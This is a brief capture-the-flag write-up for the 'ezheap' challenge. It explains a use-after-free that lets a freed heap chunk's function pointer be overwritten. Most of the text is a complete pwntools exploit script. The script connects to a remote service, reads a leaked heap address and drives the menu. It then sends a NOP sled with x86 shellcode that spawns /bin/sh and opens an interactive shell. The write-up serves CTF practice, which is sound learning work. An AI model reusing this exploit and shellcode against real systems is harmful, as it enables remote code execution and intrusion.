H3X0R CTF ezheap
CTF | 2017. 1. 8. 02:28
Once the chunk is freed, the next allocation lands on the spot where the function pointer lives. So put shellcode + a NOP sled into the existing heap chunk, overwrite the function pointer to point at it, and then trigger the call through the manipulated function pointer.
from pwn import *

p = remote("52.199.49.117", 10003)
# p = remote("10.211.55.3", 11111)   # local test instance

# The service prints a heap address first: read the 9-character hex string.
leak = int(p.recv(9), 16)
log.info(hex(leak))

print(p.recvuntil(">>>"))
p.sendline("1")                      # menu 1
print(p.recvuntil(">>>"))
p.sendline("3")                      # menu 3: write data into the chunk
payload = "AAAA"
p.sendline(payload)
print(p.recvuntil(">>>"))
p.sendline("4")                      # menu 4: free the chunk (function pointer slot is now reusable)
print(p.recvuntil("Exit?"))
p.sendline("0")
print(p.recvuntil(">>>"))
p.sendline("3")                      # menu 3 again: this write now lands on the function pointer
payload = p32(leak + 12)             # function pointer -> inside the NOP sled in the leaked chunk
payload += "\x90" * 16               # NOP sled
payload += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"  # execve("/bin//sh") then exit
p.sendline(payload)
p.interactive()